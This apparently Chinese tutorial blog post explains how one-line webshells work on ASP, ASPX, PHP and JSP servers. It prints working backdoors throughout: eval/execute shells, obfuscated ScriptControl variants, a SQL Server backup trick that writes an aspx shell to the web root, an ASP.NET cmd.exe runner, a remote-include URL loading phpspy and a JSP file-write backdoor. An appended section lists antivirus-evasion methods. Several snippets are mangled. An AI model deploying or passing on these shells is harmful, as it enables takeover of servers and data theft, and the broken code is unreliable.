php一句话工作原理,一句话木马的工作原理

本文详细解析了PHP一句话木马的工作原理,包括服务端和客户端的角色,以及如何利用这种木马进行文件操作和执行命令。通过示例代码,阐述了如何构造和触发木马,同时提到了常见的错误处理和木马变体,如ASP和PHP环境下的变种。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一句话木马的工作原理:一句话木马分析服务端与客户端。

'一句话木马'服务端(是用于本地的html提交脚本木马文件)

就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 其中value可以自己修改

'一句话木马'客户端(远程服务器上被插入一句话的asp可执行文件)

用来向服务端提交控制数据的,提交的数据通过服务端构成完整的asp功能语句并执行,也就是生成我们所需要的asp木马文件

一句话木马的适用环境:1.服务器的来宾账户有写入权限

2.已知数据库地址且数据库格式为asa或asp

3.在数据库格式不为asp或asa的情况下,如果能将一句话插入到asp文件中也可

现在先假设在远程主机的TEXT.ASP(客户端)中已经有了这个语句.)在ASP里意思是执行省略号里的语句.那么如果我写进我们精心构造的语句,它也是会帮我们执行的.就按照这上面的思路,我们就可以在本地构造一个表单内容如下:(//为注释)

setlP=server.createObject('Adodb.Stream')//建立流对象

lP.Open //打开

lP.Type=2//以文本方式

lP.CharSet='gb2312'//字体标准

lP.writetext request('newvalue')

lP.SaveToFile server.mappath('newmm.asp'),2 //将木马内容以覆盖文件的方式写入newmm.asp,2就是已覆 盖的方式

lP.Close //关闭对象

setlP=nothing//释放对象

response.redirect 'newmm.asp' //转向newmm.asp

添入生成木马的内容

表单的作用就是把我们表单里的内容提交到远程主机的TEXT.ASP这个文件.然后因为TEXT.ASP里有这句,那么这句代码就会执行我们从表单里传来的内容哦.(表单名必须和里的VALUE一样,就是我用蓝色标记的那两处,必须相等)

说到这里大家是不是清楚了.我们构造了两个表单,第一个表单里的代码是文件操作的代码(就是把第二个表单内的内容写入在当前目录下并命名为newvalue.ASP的这么一段操作的处理代码)那么第二个表单当然就是我们要写入的马了.

具体的就是下面这一段:

setlP=server.createObject('Adodb.Stream')//建立流对象

lP.Open //打开

lP.Type=2//以文本方式

lP.CharSet='gb2312'//字体标准

lP.writetext request('newvalue')

lP.SaveToFile server.mappath('newvalue.asp'),2 //将木马内容以覆盖文件的方式写入newmm.asp,2就是已覆 盖的方式

lP.Close //关闭对象

setlP=nothing//释放对象

response.redirect 'newmm.asp' //转向newmm.asp

这样的话第二个表单的名字必须和lP.writetext request('newvalue') 里的Newvalue一样,就是我用红色标注的那两处.

至此只要服务器有写的权限你表单所提交的大马内容就会被写入到newmm.asp中。即newmm.asp为我们的shell地址。

关于服务器错误:

经常,当我们在一个asp文件内添加了一句话后,就会出现类型不匹配的错误:

Script error detected at line 1.

Source line: execute request('nettoo')

Description: 类型不匹配: 'execute'

这个如何解决呢?

想出了一个好办法,只要用'eval'替换掉'execute'服务端,就不会出错了!

用一句话客户端连接,加入容错语句,你可以把它插入到任何ASP文件而不会像以前一样出错。

常见asp一句话木马的变体:

ms.Language='VBScript'

ms.AddObject 'Response', Response

ms.AddObject 'request', request

ms.AddObject 'session', session

ms.AddObject 'server', server

ms.AddObject 'application', application

ms.ExecuteStatement ('ex'&'ecute(request(chr(35)))')%>

ExecuteGlobal request(chr(35))

9月30日

数据库里插入

┼攠数畣整爠焕敌瑳∨∣┩忾

utf-7的马

ms.Language='VBScript'

ms.AddObject 'Response', Response

ms.AddObject 'request', request

ms.AddObject 'session', session

ms.AddObject 'server', server

ms.AddObject 'application', application

ms.ExecuteStatement ('ex'&'ecute(request(chr(35)))')%>

各种环境下的一句话木马:

aspx

1.相当于ASP的一句话木马:

程序代码

alter database pubs set RECOVERY FULL--

create table pubs.dbo.cmd(a image)

backup log pubs to disk = 'c:/TM' with init

insert into pubs.dbo.cmd(a) values (' ')

backup log pubs to disk = 'd:/test11.aspx'

//这个和asp的一样,客户端post一个变量l 把木马代码丢在变量l里面就ok了 这个是类似asp的一句话木马。

//mu.aspx.htm 客户端:(提交后访问:http://IP/images.aspx)

在下面输入大马内容:

Sub RunCmd(Src As Object, E As EventArgs)

Dim myProcess As New Process()

Dim myProcessStartInfo As New ProcessStartInfo(xpath.Text)

myProcessStartInfo.UseShellExecute=False

myProcessStartInfo.RedirectStandardOutput=true

myProcess.StartInfo=myProcessStartInfo

myProcessStartInfo.Arguments=xCmd.text

myProcess.Start()

Dim myStreamReader AsStreamReader=myProcess.StandardOutput

Dim myString AsString=myStreamReader.Readtoend()

myProcess.Close()

mystring=replace(mystring,'

mystring=replace(mystring,'>','>')

result.text=vbcrlf& '

' & mystring & '
'

End Sub

ASP.NET Shell for WebAdmin2.X Final

;Program

c:/windows/system32/cmd.exe

Arguments

/c net user

2、下面这个是我找网上的asp.net的上传文件程序,修改精简了下,也可以用:

程序代码

drop table pubs.dbo.cmd

alter database pubs set RECOVERY FULL

create table pubs.dbo.cmd(a image)

backup log pubs to disk = 'c:/TM' with init

insert into pubs.dbo.cmd(a) values ('

')

backup log pubs to disk = 'c:/inetpub/wwwroot/test11.aspx'

PHP

本文没有什么特别之处,仅求抛砖引玉。并送给和我一样菜的在PHP门边徘徊的朋友。

刚学PHP没几天,我就急于功成,所以有错误及不足之处请大家积极指出。

PHP语法的强大是ASP望尘莫及的,仅一个: phpinfo();?>就可以刺探整个服务器的配置。运行cmd,上传文件等,都是非常简便的,现在用的好的PHP木马,莫过于angel的phpspy了。昨天hak_ban问怎么给PHP木马加密,我还没想到,但是对于写一个微型PHP木马,我想还是很难被杀的。

这里简单探讨一下几个函数可以作为木马的使用:

1. 可以运行外部命令的几个函数:system,passthru,exec,shell_exec,popen。

例:只要将<?system ($cmd);?>等保存为cmd.php及可实现运行外部命令的功能。这几个函数可以说是最早的微行php木马了,所以一般虚拟主机的设置也会将这些函数屏蔽的。

2.还记得WDB论坛的style.php的漏洞吗?我们可以利用这个做个很难被杀的小木马。如下:

将其保存为1.php ,我们就可以调用其他不支持php服务器里的.php木马(如phpspy.php)来达到我们的目的:http://target.com/1.php? Include=http://www.xxx.com/phpspy.php

这里http://www.918x.com是不支持php的,否则将会在http://www.xxx.com这台服务器运行phpspy.php,而不是目标服务器。

3. 这个还是angel在Discuz 2.2F的攻击中给我们的一个非常好的上传木马,我没有改:

将其保存为up.php后,在本地提交表单:

就可以把大个的php木马上传上去。

4. 我一直在想有没有同冰狐浪子的那个ASP一句话木马一样通过本地表单提交运行的PHP木马。终于找到了函数:eval,在PHP4中文参考手册上它的语法说明:

语法: void eval(string code_str);

内容说明:本函数可将字符串之中的变量值代入,通常用在处理数据库的资料上。参数 code_str 为欲处理的字符串。值的 注意的是待处理的字符串要符合 PHP 的字符串格式,同时在结尾处要有分号。使用本函数处理后的字符串会沿续到 PHP 程序结束。

我们可以在目标主机上保存:<?eval ($cmd);?>为一个PHP文件(我想也可以插在PHP任意文件里)。然后通过本地提交来达到目的,但与ASP不同的是,在magic_quotes_gpc = on的时候,过滤的很多的字符,使得这个使用功能大大的缩小。

对于这个PHP木马本地表单我做了很多次,还没有成熟的代码。还请高手指教。写好后会奉献给大家的。但是eval这个函数可以做微型PHP木马是无须质疑的。

Ps:写完后,有人告诉我,其实高手早就有微型的PHP木马了,只是没有公开。哎,我好郁闷啊,研究的都是人家早就有了的成果。不管怎么样,和大家分享一下我的研究,希望能得到帮助和指教。

JSP

<%

if(request.getParameter('f')!=null)(new java.io.FileOutputStream(application.getRealPath('//') request.getParameter('f'))).write(request.getParameter('t').getBytes());

%>

这个 后门估计不用我说了吧.还是提示一下咯.保存为1.jsp 提交url!

http://localhost/1.jsp?f=1.txt&t=hello

然后:http://localhost/1.txt 就出来了 内容为 hello .....

### 一句木马 PHP 的实现原理 #### 背景介绍 PHP作为种广泛使用的服务器端脚本语言,在Web开发领域占据重要地位。然而,这种灵活性也使得恶意攻击者能够利用其特性创建所谓的“一句木马”。这类程序通常极其简洁却功能强大,能够在目标服务器上执行任意命令。 #### 基础结构解析 最简单形式的一句木马往往由两部分组成:接收外部输入的部分以及根据接收到的内容采取行动的部分。例如: ```php <?php @eval($_POST['cmd']);?> ``` 此代码片段会监听HTTP POST请求中的`cmd`参数,并尝试将其作为PHP代码执行[^1]。这意味着只要向该页面发送带有适当指令的POST请求,就能让服务器按照指示行事——无论是读取文件、修改数据库记录还是启动其他进程都不例外。 #### 数据传输方式 为了使上述机制生效,客户端需要通过特定的方式传递想要被执行的操作语句。常见的做法是在发起HTTP请求时附带必要的数据包。比如使用curl工具或浏览器插件构建自定义表单提交过程,其中包含触发条件和实际要运行的命令字符串[^4]。 #### 安全规避策略 随着安全防护措施日益严密,“传统”的一句木马越来越难以逃过检测。因此出现了多种变种形态以增加隐蔽性和抗查杀能力。其中包括但不限于: - **编码混淆**:采用base64等算法对原始payload进行转换后再传入; - **逻辑拆分**:将完整的恶意代码分割成多个看似无害的小片段分别植入不同位置; - **环境感知**:加入判断逻辑确保只在满足某些前提条件下才激活恶意行为; 这些手段共同作用下可以让简单的几行代码变得异常复杂难辨,大大提高了入侵成功的几率同时也增加了事后追踪分析工作的难度[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值